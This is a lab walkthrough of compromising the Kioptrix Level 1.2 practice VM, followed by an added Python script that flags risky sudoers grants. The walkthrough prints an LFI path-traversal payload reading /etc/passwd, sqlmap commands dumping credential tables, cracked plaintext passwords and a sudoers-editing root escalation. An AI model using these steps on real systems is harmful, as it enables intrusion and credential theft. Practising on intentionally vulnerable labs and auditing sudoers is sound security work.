This is a walkthrough of how I completed Kioptrix Level 1.2. The goal of this challenge is to collect the flag.
[email protected]:~# nmap -n -sV -A -p- kioptrix3.com
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 4.7p1 Debian 8ubuntu1.2 (protocol 2.0)
| ssh-hostkey:
|   1024 30:e3:f6:dc:2e:22:5d:17:ac:46:02:39:ad:71:cb:49 (DSA)
|_  2048 9a:82:e6:96:e4:7e:d6:a6:d7:45:44:cb:19:aa:ec:dd (RSA)
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.6 with Suhosin-Patch)
|_http-methods: No Allow or Public header in OPTIONS response (status code 200)
|_http-title: Ligoat Security - Got Goat? Security ...
This little website is powered by LotusCMS, which is vulnerable to remote code execution. However, I wasn’t having much luck with anything other than the exploit in the Metasploit Framework. Since I don’t like to rely on this, I pressed on to find another route in.
LotusCMS also has an LFI vulnerability, which I used to enumerate a list of users on the system (via http://kioptrix3.com/index.php?system=../../../../../etc/passwd%00.html):
loneferret:x:1000:100:loneferret,,,:/home/loneferret:/bin/bash
dreg:x:1001:1001:Dreg Gevans,0,555-5566,:/home/dreg:/bin/rbash
I actually decided to hold off on bruteforcing their SSH logins. It was my assumption that at this level of challenge, the password would be too complex to bruteforce in a reasonable amount of time.
One of the blog posts refers to a new gallery application at kioptrix3.com/gallery.
A review of the page’s source code reveals an HTML comment which shows the location of the admin login page, /gallery/gadmin. This login page tells us that the application is called Gallarrific, which is vulnerable to SQLi in gallery.php.
I plugged the URL into SQLMap and it confirmed the vulnerability.
[email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null --current-user --is-dba --current-db
web server operating system: Linux Ubuntu 8.04 (Hardy Heron)
web application technology: PHP 5.2.4, Apache 2.2.8
back-end DBMS: MySQL 5.0
current user: [email protected]'
current database: 'gallery'
current user is DBA: True

[email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null -D gallery --tables
+----------------------+
| dev_accounts         |
| gallarific_comments  |
| gallarific_galleries |
| gallarific_photos    |
| gallarific_settings  |
| gallarific_stats     |
| gallarific_users     |
+----------------------+

[email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null -D gallery -T dev_accounts --dump
I saved these hashes and cracked them with john.
[email protected]:~# john /tmp/sqlmaphashes-eOPcIU.txt --format=raw-md5
starwars         (loneferret)
Mast3r           (dreg)
I also dumped the password for the admin account on gallarific.
[email protected]:~# sqlmap -u http://kioptrix3.com/gallery/gallery.php?id=null -D gallery -T gallarific_users --dump
admin:n0t7t1k4
My original intent was to use the admin password for Gallarific and attempt to upload a PHP backdoor. However, I first decided to try the two passwords from the dev_accounts with SSH.
I was able to log in as loneferret with the password starwars (which blew my original SSH theory out of the water).
Within loneferret’s home directory was a file called CompanyPolicy.README:
[email protected]:~$ cat CompanyPolicy.README
Hello new employee,
It is company policy here to use our newly installed software for editing, creating and viewing files.
Please use the command 'sudo ht'.
I confirmed that loneferret had the rights to run ht with sudo.
[email protected]:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
The obvious solution is to modify the sudoers file with ht, giving loneferret sudo rights to /bin/bash:
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht, /bin/bash
[email protected]:~$ sudo -l
User loneferret may run the following commands on this host:
    (root) NOPASSWD: !/usr/bin/su
    (root) NOPASSWD: /usr/local/bin/ht
    (root) NOPASSWD: /bin/bash
[email protected]:~$ sudo /bin/bash
[email protected]:~# id
uid=0(root) gid=0(root) groups=0(root)
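The sudo rule above is the whole problem: an editor run as root can rewrite /etc/sudoers, so `sudo ht` is effectively a root shell. The following is an added example, not code from the original post, that audits sudoers lines for exactly this pattern; the sets of editor and shell binary names are an assumption for the example, not a complete catalogue.

```python
import re
# Added example, not from the original post: flag sudoers rules that hand out an
# editor or a shell as root. An editor run as root (here /usr/local/bin/ht) can
# rewrite /etc/sudoers itself. The binary sets below are an assumed, partial list.
EDITORS = {"ht", "vi", "vim", "nano", "emacs", "less", "more"}
SHELLS = {"bash", "sh", "dash", "zsh", "su"}
SKIP = ("Defaults", "Cmnd_Alias", "User_Alias", "Host_Alias", "Runas_Alias")
# user host = (runas) [TAG:] cmd, cmd, ...  (aliases are not expanded here)
RULE_RE = re.compile(r"^(\S+)\s+([^=\s]+)\s*=\s*(?:\(([^)]*)\)\s*)?(?P<cmds>.+)$")

def audit_sudoers_line(line):
    """Return [(command, reason, nopasswd)] for one sudoers rule, [] if clean."""
    line = line.split("#", 1)[0].strip()
    if not line or line.startswith(SKIP):
        return []
    m = RULE_RE.match(line)
    if not m:
        return []
    findings, nopasswd = [], False  # a tag sticks for the rest of the list
    for cmd in m.group("cmds").split(","):
        cmd = cmd.strip()
        if cmd.startswith(("NOPASSWD:", "PASSWD:")):
            tag, cmd = cmd.split(":", 1)
            nopasswd, cmd = (tag == "NOPASSWD"), cmd.strip()
        if not cmd or cmd.startswith("!"):
            continue  # a negated entry such as !/usr/bin/su grants nothing
        name = cmd.split()[0].rsplit("/", 1)[-1]
        if name == "ALL":
            findings.append((cmd, "all-commands", nopasswd))
        elif name in SHELLS:
            findings.append((cmd, "shell", nopasswd))
        elif name in EDITORS:
            findings.append((cmd, "editor", nopasswd))
    return findings

def audit_sudoers(text):
    """Audit a whole sudoers file; returns {line_number: findings}."""
    out = {}
    for n, line in enumerate(text.splitlines(), 1):
        hits = audit_sudoers_line(line)
        if hits:
            out[n] = hits
    return out

# Constructed sample modelled on the rule shown in the walkthrough
SAMPLE = """Defaults env_reset
root ALL=(ALL) ALL
loneferret ALL=NOPASSWD: !/usr/bin/su, /usr/local/bin/ht
alice ALL=(root) /usr/bin/apt-get update
"""
```

Running `audit_sudoers(SAMPLE)` reports the root ALL rule and the ht editor grant on line 3 while leaving the apt-get rule alone.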